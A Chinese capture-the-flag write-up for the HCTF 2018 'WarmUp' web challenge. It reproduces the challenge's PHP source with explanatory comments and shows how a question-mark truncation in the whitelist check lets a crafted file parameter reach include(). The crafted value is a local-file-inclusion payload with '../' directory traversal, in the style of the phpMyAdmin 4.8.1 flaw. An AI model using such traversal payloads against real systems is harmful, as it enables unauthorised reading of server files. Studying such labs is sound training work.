IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> PHP知识库 -> [HCTF 2018]WarmUp -> 正文阅读

[PHP知识库][HCTF 2018]WarmUp

[HCTF 2018]WarmUp

代码审计

文件包含漏洞(phpmyadmin 4.8.1任意文件包含)

查看源码发现source.php,打开查看在白名单里发现了hint.php

在这里插入图片描述

访问得到提示

在这里插入图片描述

 <?php
    highlight_file(__FILE__);                                                   
	
	//highlight_file(filename,return):对文件进行高亮显示,使用该函数时对整个文件被显示,不论是密码还是其他敏感文件
	//用于高亮的颜色可通过php.ini文件进行设置,或者通过调用ini_set()函数进行设置
	
	
	
    class emmm
    {
        public static function checkFile(&$page) 				
        //传入变量page,也就是我们刚刚传进来的file
        {
            
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];         
             //白名单列表
			
            if (! isset($page) || !is_string($page)) {                     
                     //isset()判断变量是否已经设置
                
                echo "you can't see it";                               
                   //is_string()判断变量是不是字符串
               
                return false;                                         
                    //&&或者||前后都正确才能运行if的值
            }

																
	
	//in_array()函数判断变量是否符合白名单里的,如果符合则执行
            if (in_array($page, $whitelist)) {
                return true;
            }
																
	
	//过滤问好的函数(如果$page的值有?则从?之前提取数字)
            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')                 

 //mb_substr返回$page.里?和?之间的数据,
 也就是截断,截取file=ddd
            );
			
																
//第二次检测传进来的值是否匹配白名单列表,若符合则执行真
            if (in_array($_page, $whitelist)) {
                return true;
            }

            $_page = urldecode($page);                       
     //url对$page解码
													
//第二次过滤问号的函数(如果$page的值有?则从?之前提取字符串)
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {            
     
//第三次检测传进来的值是否匹配白名单列表,若符合则执行真
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }
//要求我们上传的file变量不能为空
    if (! empty($_REQUEST['file'])                   


        && is_string($_REQUEST['file'])	 //要求上传的为字符串
        && emmm::checkFile($_REQUEST['file'])    
                               //将我们的的值传到emmm类里面的checkFile函数
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  
?>

总体来说利用的是源码最后的文件包含漏洞

include $_REQUEST[‘file’];

也就是需要include ffffllllaaaagggg 文件,因为我们不值得ffffllllaaaagggg具体在哪个文件里所以需要…/来绕过

构造payload:

index.php?file=source.php?../../../../../ffffllllaaaagggg

总体的流程

第一个if返回flash

第二个if返回flash

经过mb_substr截断 _page

第三个if返回ture,这时退出checkFile(),送到最后一个if检查而且截断之后的变量满足if(true&&true&&true),则执行

include(source.php?../../../../../../ffffllllaaaagggg))

文章参考:https://blog.csdn.net/qq_51927659/article/details/116030931?utm_medium=distribute.pc_relevant_t0.none-task-blog-2%7Edefault%7ECTRLIST%7Edefault-1.no_search_link&depth_1-utm_source=distribute.pc_relevant_t0.none-task-blog-2%7Edefault%7ECTRLIST%7Edefault-1.no_search_link

  PHP知识库 最新文章
Laravel 下实现 Google 2fa 验证
UUCTF WP
DASCTF10月 web
XAMPP任意命令执行提升权限漏洞(CVE-2020-
[GYCTF2020]Easyphp
iwebsec靶场 代码执行关卡通关笔记
多个线程同步执行,多个线程依次执行,多个
php 没事记录下常用方法 (TP5.1)
php之jwt
2021-09-18
上一篇文章      下一篇文章      查看所有文章
加:2021-09-23 11:13:30  更:2021-09-23 11:14:31 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/23 22:26:45-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码